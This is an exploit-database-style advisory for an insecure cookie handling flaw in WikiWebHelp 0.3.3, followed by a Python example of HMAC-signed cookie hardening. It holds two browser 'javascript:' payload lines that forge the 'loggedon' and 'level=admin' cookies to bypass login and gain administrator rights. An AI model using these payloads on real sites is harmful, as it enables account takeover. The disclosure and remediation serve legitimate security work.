vendor: WikiWebHelp
by: FuRty
CVSS: 8,3 (HIGH)
Cookie Handling
CWE: N/A
Product Name: WikiWebHelp
Affected Version From: 0.3.3
Affected Version To: 0.3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:wikiwebhelp:wikiwebhelp:0.3.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
WikiWebHelp v0.3.3 <= Insecure Cookie Handling
Browser Injection for handling() by Javascript-SQLi Codes. Do not rush to primarily target the site, please register :)
javascript:document.cookie="loggedon=[VictimNICK];path=/";
javascript:document.cookie="level=admin;path=/";
Mitigation:
Ensure that cookies are properly validated and sanitized before being used.
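
One way to apply this mitigation, as an added example that is not WikiWebHelp code: the first function trusts the `loggedon` and `level` cookies named above exactly as the browser sends them, and the hardened path accepts only a value the server issued and tagged with an HMAC. The `auth` cookie name, the function names and the key are assumptions made for illustration.

```python
import hashlib
import hmac

# Constructed demo key; a real deployment loads a random secret from server-side config.
SECRET_KEY = b"constructed-demo-key-not-for-production"


def is_admin_vulnerable(cookies):
    """Weak pattern: identity and role are read straight from client-set cookies."""
    return bool(cookies.get("loggedon")) and cookies.get("level") == "admin"


def _tag(payload):
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_auth_cookie(username, level):
    """Server side, after a successful login: bind user and level under an HMAC tag."""
    if "|" in username or "|" in level:
        raise ValueError("separator character not allowed in fields")
    payload = f"{username}|{level}"
    return f"{payload}|{_tag(payload)}"


def verify_auth_cookie(value):
    """Return (username, level) when the tag verifies, otherwise None."""
    parts = (value or "").split("|")
    if len(parts) != 3:
        return None
    username, level, tag = parts
    expected = _tag(f"{username}|{level}")
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    return username, level


def is_admin_hardened(cookies):
    """The role comes only from a cookie whose tag the server can verify."""
    verified = verify_auth_cookie(cookies.get("auth"))
    return verified is not None and verified[1] == "admin"


if __name__ == "__main__":
    # Constructed sample: cookies set by hand in the browser, as in the advisory.
    forged = {"loggedon": "alice", "level": "admin"}
    print("vulnerable check:", is_admin_vulnerable(forged))  # accepted
    print("hardened check:  ", is_admin_hardened(forged))    # rejected
```

The signed value carries no expiry or revocation; a server-side session store keyed by a random identifier covers both.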